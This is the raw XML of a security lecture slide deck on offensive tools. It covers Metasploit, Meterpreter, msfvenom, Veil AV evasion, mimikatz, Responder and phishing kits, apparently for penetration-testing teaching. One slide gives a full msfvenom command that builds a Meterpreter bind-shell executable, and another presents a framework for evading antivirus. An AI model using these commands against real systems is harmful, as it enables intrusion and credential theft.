                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>One stop shop for standalone payload generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>For those times when you want something smaller than Metasploit/Meterpreter or have a different method to get the payload to the victim system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40055038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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –p –f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> : payload to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> : format of the payload (tons, raw or exe most used)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</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bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -f exe -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>output.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Helpful reference guide: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://netsec.ws/?p=331</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370564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0 at 10.56.59 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-125570" b="-125570"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-1407878"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2016-06-20 at 11.16.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70" y="1838270"/>
            <a:ext cx="8430795" cy="4384690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16793026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0 at 11.00.13 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-64445" b="-64445"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-1140493"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2016-06-20 at 11.18.52 PM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56" y="2431791"/>
            <a:ext cx="8492349" cy="4426209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35332188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6-06-20 at 11.10.21 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-2307" b="-2307"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9923938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6-06-20 at 11.21.17 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-8828" b="-8828"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22393738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Veil Evasion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Framework to obfuscate code to prevent detection by AV/anti-malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.veil-framework.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/framework/veil-evasion/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24417647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6-21 at 2.54.05 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-452" b="-452"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33227423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6-06-21 at 2.55.25 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-5057" r="-5057"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="935846"/>
            <a:ext cx="8674530" cy="5464954"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2764142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6-06-21 at 2.56.19 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-41048" b="-41048"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2993194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3358</TotalTime>
  <Words>4109</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>560</Paragraphs>
  <Slides>139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139</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="144" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Adjacency</vt:lpstr>
      <vt:lpstr>Information Security Tools</vt:lpstr>
      <vt:lpstr>Offense</vt:lpstr>
      <vt:lpstr>Phases of an attack</vt:lpstr>
      <vt:lpstr>Attack characteristics</vt:lpstr>
      <vt:lpstr>Penetration Testing</vt:lpstr>
      <vt:lpstr>Why do we do this?</vt:lpstr>
      <vt:lpstr>Why do we do this?</vt:lpstr>
      <vt:lpstr>Standard warnings apply</vt:lpstr>
      <vt:lpstr>What is an exploit?</vt:lpstr>
      <vt:lpstr>Vulnerable vs Exploitable</vt:lpstr>
      <vt:lpstr>Exploit Disclosure Types</vt:lpstr>
      <vt:lpstr>Use in a Penetration Test?</vt:lpstr>
      <vt:lpstr>Getting to EIP</vt:lpstr>
      <vt:lpstr>Stack based overflow</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>NOP sled</vt:lpstr>
      <vt:lpstr>Heap based overflow</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Buffer Overflow defenses</vt:lpstr>
      <vt:lpstr>3 Main Categories of Exploits</vt:lpstr>
      <vt:lpstr>Use in a Penetration Test?</vt:lpstr>
      <vt:lpstr>Server-side</vt:lpstr>
      <vt:lpstr>Notable Windows Server-side Exploits</vt:lpstr>
      <vt:lpstr>MS17-010 / ExternalBlue</vt:lpstr>
      <vt:lpstr>EternalBlue History</vt:lpstr>
      <vt:lpstr>EternalBlue Deeper Dive</vt:lpstr>
      <vt:lpstr>Notable Unix Server-side Exploits</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Drupal SA-CORE-2014-005</vt:lpstr>
      <vt:lpstr>From Drupal’s announcement</vt:lpstr>
      <vt:lpstr>Log4j (Log4Shell)</vt:lpstr>
      <vt:lpstr>log4j – The Vulnerability </vt:lpstr>
      <vt:lpstr>So Easy, Anyone Can Do It!</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Client-side Exploits</vt:lpstr>
      <vt:lpstr>Notable Client-side exploits</vt:lpstr>
      <vt:lpstr>What could possibly go wrong?</vt:lpstr>
      <vt:lpstr>Local privilege escalation</vt:lpstr>
      <vt:lpstr>Local privilege escalation attack types</vt:lpstr>
      <vt:lpstr>CVE-2021-3156 (Baron Samedit)</vt:lpstr>
      <vt:lpstr>MS14-068</vt:lpstr>
      <vt:lpstr>Golden Tickets?</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>More on Golden Tickets</vt:lpstr>
      <vt:lpstr>#realtalk</vt:lpstr>
      <vt:lpstr>What to Test in a Pen Test?</vt:lpstr>
      <vt:lpstr>Assumed Breach</vt:lpstr>
      <vt:lpstr>Typical Attack Path</vt:lpstr>
      <vt:lpstr>Physical Pen Test</vt:lpstr>
      <vt:lpstr>Physical Pen Test</vt:lpstr>
      <vt:lpstr>Physical Pen Test / Social Engineering</vt:lpstr>
      <vt:lpstr>Social Engineering</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Legit</vt:lpstr>
      <vt:lpstr>Not Legit</vt:lpstr>
      <vt:lpstr>gophish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don’t need to get fancy…</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Vulnerability Exploitation </vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Meterpreter</vt:lpstr>
      <vt:lpstr>Metasploit Modules</vt:lpstr>
      <vt:lpstr>Metasploit Modules</vt:lpstr>
      <vt:lpstr>Exploits: Active vs. Passive</vt:lpstr>
      <vt:lpstr>Metasploit Interfaces</vt:lpstr>
      <vt:lpstr>Payloads: Single, Stagers and Stages</vt:lpstr>
      <vt:lpstr>Why Use Stages For a Payload?</vt:lpstr>
      <vt:lpstr>Stager Examples</vt:lpstr>
      <vt:lpstr>Bind vs Reverse Shell</vt:lpstr>
      <vt:lpstr>Stage Examples</vt:lpstr>
      <vt:lpstr>DLL Injection (Windows)</vt:lpstr>
      <vt:lpstr>msfconsole as a Shell</vt:lpstr>
      <vt:lpstr>msfvenom</vt:lpstr>
      <vt:lpstr>msfvenom</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Veil Evasion</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>More evasion techniques</vt:lpstr>
      <vt:lpstr>Post Exploitation - Windows</vt:lpstr>
      <vt:lpstr>Incognito</vt:lpstr>
      <vt:lpstr>getsystem</vt:lpstr>
      <vt:lpstr>A Quick Word on Windows Authentication</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Passwords stored in memory</vt:lpstr>
      <vt:lpstr>load mimikatz</vt:lpstr>
      <vt:lpstr>mimikatz</vt:lpstr>
      <vt:lpstr>mimikatz</vt:lpstr>
      <vt:lpstr>mimikatz</vt:lpstr>
      <vt:lpstr>mimikatz</vt:lpstr>
      <vt:lpstr>mimikatz</vt:lpstr>
      <vt:lpstr>mimikatz</vt:lpstr>
      <vt:lpstr>Metasploit exercise</vt:lpstr>
      <vt:lpstr>John The Ripper</vt:lpstr>
      <vt:lpstr>hashdump</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Password Cracking</vt:lpstr>
      <vt:lpstr>John Exercise</vt:lpstr>
      <vt:lpstr>hashcat</vt:lpstr>
      <vt:lpstr>Armitage</vt:lpstr>
      <vt:lpstr>Cobalt Strike</vt:lpstr>
      <vt:lpstr>Metasploit Pro</vt:lpstr>
      <vt:lpstr>Responder</vt:lpstr>
      <vt:lpstr>Responder</vt:lpstr>
      <vt:lpstr>Responder – How it works</vt:lpstr>
      <vt:lpstr>Responder</vt:lpstr>
      <vt:lpstr>Responder - Hashes</vt:lpstr>
      <vt:lpstr>Responder</vt:lpstr>
      <vt:lpstr>Responder</vt:lpstr>
      <vt:lpstr>Responder - Defense</vt:lpstr>
      <vt:lpstr>Responder Demo</vt:lpstr>
      <vt:lpstr>BloodHound</vt:lpstr>
      <vt:lpstr>Empire</vt:lpstr>
      <vt:lpstr>DeathStar</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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Tools for Information Security</dc:title>
  <dc:creator>Kevin Shivers</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>369</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-07-14T00:24:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-08T02:34:50Z</dcterms:modified>
</cp:coreProperties>
</file>